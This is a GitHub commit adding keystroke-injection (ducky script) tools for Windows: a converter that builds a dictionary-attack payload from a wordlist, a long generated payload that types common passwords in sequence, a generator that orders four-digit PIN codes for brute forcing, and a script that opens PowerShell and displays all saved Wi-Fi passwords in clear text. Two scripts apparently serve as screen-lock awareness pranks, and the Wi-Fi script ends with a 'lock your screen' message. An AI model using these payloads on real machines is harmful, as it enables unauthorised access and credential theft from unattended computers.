Add files via upload

This commit is contained in:
Zarcolio
2023-04-13 08:06:48 +02:00
committed by GitHub
parent 8ab81bc27e
commit 81020a4aff
8 changed files with 50784 additions and 0 deletions
+42
View File
@@ -0,0 +1,42 @@
[CmdletBinding()]
param(
[Parameter(Mandatory=$true, Position=0, HelpMessage="Path of the input file.")]
[ValidateScript({Test-Path $_ -PathType Leaf})]
[string]$InputFile,
[Parameter(Position=1, HelpMessage="Delay in milliseconds.")]
[int]$Delay = 500,
[Parameter(Position=2, HelpMessage="Wait time in milliseconds.")]
[int]$Wait = $null
)
# Determine output folder and file path
if (-not $InputFile.Contains("\") -and -not $InputFile.Contains("/")) {
$InputFile = Join-Path -Path (Get-Location) -ChildPath $InputFile
}
$OutputFolder = Split-Path -Parent $InputFile
if ([string]::IsNullOrWhiteSpace($OutputFolder)) {
Throw "Output folder cannot be determined from input file path."
}
$OutputFile = Join-Path -Path $OutputFolder -ChildPath "Dict_Attack.txt"
Write-Verbose "Output file path: $OutputFile"
# Create new output file or overwrite existing file
New-Item -ItemType File -Path $OutputFile -Force -ErrorAction Stop | Out-Null
Write-Verbose "Output file created successfully: $OutputFile"
# Read input file and convert to ducky script
$EnterKey = [char]13
$Lines = Get-Content $InputFile
foreach ($Line in $Lines) {
if ($Wait) {
$WaitStr = "DELAY $Wait"
}
else {
$WaitStr = "WAIT_FOR_BUTTON_PRESS"
}
$command = "STRING $line`nDELAY $Delay`nENTER`n$WaitStr`n"
Add-Content -Path $OutputFile -Value $Command
}
Write-Verbose "Conversion complete."
+26
View File
@@ -0,0 +1,26 @@
[CmdletBinding()]
param(
[Parameter(Mandatory=$true)][string]$InputFile
)
# Check if the input file exists
if (-not (Test-Path $InputFile)) {
Write-Error "The input file does not exist."
exit 1
}
# Read the contents of the input file
$content = Get-Content -Path $InputFile
# Replace the specified characters in the content
$updatedContent = $content -replace "([~`'""^])", "$('${1}' * 2)`nBACKSPACE`nSTRING "
# Remove lines equal to "STRING" after trimming
$updatedContent = $updatedContent.Trim() -replace "(`n|^)STRING(`n|$)", ""
# Prepare the output file name by adding "-edit" before the file extension
$outputFile = [System.IO.Path]::GetFileNameWithoutExtension($InputFile) + "-edit" + [System.IO.Path]::GetExtension($InputFile)
# Write the updated content to the output file
Set-Content -Path $outputFile -Value $updatedContent
+13
View File
@@ -0,0 +1,13 @@
DELAY 1000
GUI r
DELAY 500
STRING microsoft-edge:https://eyelockmyscreen.com
SPACE
ENTER
DELAY 2000
CTRL l
DELAY 500
STRING javascript:document.documentElement.requestFullscreen();
ENTER
DELAY 1000
GUI l
+54
View File
@@ -0,0 +1,54 @@
# Define the list of "very easy" numbers
$veryEasyNumbers = @(0, 1, 2, 3, 4, 5, 6, 7, 8, 9) | ForEach-Object {
$_.ToString() * 4 # Four identical digits
}
$veryEasyNumbers += "1234" # The sequence "1234"
# Define the list of "easy" numbers consisting of adjacent duos
$adjacentEasyNumbers = @(0, 1, 2, 3, 4, 5, 6, 7, 8, 9) | ForEach-Object {
"{0}{0}{1}{1}" -f $_, (($_ + 1) % 10) # Two pairs of digits
}
# Define the list of "easy" numbers consisting of all combinations of 2 duos
$easyNumbers = @(0..9) | ForEach-Object {
$firstDuo = "{0}{0}" -f $_
@(0..9) | ForEach-Object {
$secondDuo = "{0}{0}" -f $_
$number = "{0}{1}{2}{3}" -f $firstDuo[0], $firstDuo[1], $secondDuo[0], $secondDuo[1]
if ($veryEasyNumbers + $adjacentEasyNumbers -notcontains $number) {
$number
}
}
}
# Define the list of "easy" numbers consisting of all combinations under 100, twice
$doubleUnder100 = @(0..99) | ForEach-Object {
"{0:D2}{0:D2}" -f $_
}
# Generate all combinations from 0000 to 9999
$combinations = 0..9999 | ForEach-Object {
"{0:D4}" -f $_
}
# Randomize the order of the non-easy numbers
$nonEasyNumbers = $combinations | Where-Object {
$veryEasyNumbers + $adjacentEasyNumbers + $easyNumbers -notcontains $_
}
$randomizedNonEasyNumbers = $nonEasyNumbers | Get-Random -Count $nonEasyNumbers.Count
# Combine the easy, double under 100, and non-easy numbers and write to a file
$allNumbers = $veryEasyNumbers + $adjacentEasyNumbers + $easyNumbers + $doubleUnder100
$randomizedNumbers = @()
foreach ($number in $allNumbers) {
if ($randomizedNumbers -notcontains $number) {
$randomizedNumbers += $number
}
}
$randomizedNonEasyNumbers | ForEach-Object {
if ($randomizedNumbers -notcontains $_) {
$randomizedNumbers += $_
}
}
$randomizedNumbers | Out-File -FilePath "C:\Users\pin_codes.txt"
+606
View File
@@ -0,0 +1,606 @@
STRING 123456
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING password
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 12345678
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING qwerty
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 123456789
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 12345
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 1234
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 111111
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 1234567
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING dragon
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 123123
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING baseball
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING abc123
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING football
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING monkey
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING letmein
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 696969
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING shadow
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING master
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 666666
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING qwertyuiop
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 123321
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING mustang
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 1234567890
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING michael
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 654321
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING pussy
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING superman
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 1qaz2wsx
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 7777777
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING fuckyou
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 121212
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 000000
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING qazwsx
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 123qwe
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING killer
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING trustno1
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING jordan
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING jennifer
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING zxcvbnm
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING asdfgh
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING hunter
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING buster
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING soccer
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING harley
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING batman
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING andrew
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING tigger
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING sunshine
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING iloveyou
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING fuckme
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 2000
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING charlie
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING robert
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING thomas
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING hockey
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING ranger
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING daniel
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING starwars
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING klaster
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 112233
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING george
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING asshole
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING computer
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING michelle
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING jessica
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING pepper
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 1111
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING zxcvbn
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 555555
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 11111111
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 131313
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING freedom
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 777777
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING pass
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING fuck
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING maggie
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 159753
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING aaaaaa
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING ginger
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING princess
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING joshua
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING cheese
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING amanda
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING summer
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING love
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING ashley
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 6969
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING nicole
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING chelsea
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING biteme
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING matthew
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING access
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING yankees
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING 987654321
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING dallas
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING austin
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING thunder
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING taylor
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING matrix
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
STRING minecraft
DELAY 500
KEY
DELAY 500
WAIT_FOR_BUTTON_PRESS
+50000
View File
File diff suppressed because it is too large Load Diff
+15
View File
@@ -0,0 +1,15 @@
DELAY 1000
GUI r
DELAY 500
# Add a company policy page here:
STRING microsoft-edge:https://www.cnet.com/tech/computing/4-ways-to-lock-your-windows-10-pc/
SPACE
ENTER
DELAY 2000
CTRL f
DELAY 500
# And search for specific text:
STRING 4 ways to lock your Windows 10 PC
ENTER
DELAY 1000
GUI l
+28
View File
@@ -0,0 +1,28 @@
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $profiles = netsh wlan show profiles | Select-String ""
BACKSPACE
STRING All User Profile\s+:\s+(.+)$""
BACKSPACE
STRING | ForEach-Object { $_.Matches.Groups[1].Value }; foreach ($profile in $profiles) { Write-Host ""
BACKSPACE
STRING Wifi: $profile""
BACKSPACE
STRING ; netsh wlan show profile name=$profile key=clear | Select-String ""
BACKSPACE
STRING Key Content\s+:\s+(.+)$""
BACKSPACE
STRING | ForEach-Object { Write-Host ""
BACKSPACE
STRING Password: $($_.Matches.Groups[1].Value)`r`n""
BACKSPACE
STRING } }; Write-Host ''
BACKSPACE
STRING SOMEBODY COULD HAVE STOLEN YOUR WI-FI PASSWORDS. PLEASE LOCK YOUR SCREEN NEXT TIME!!!''
BACKSPACE
ENTER
GUI l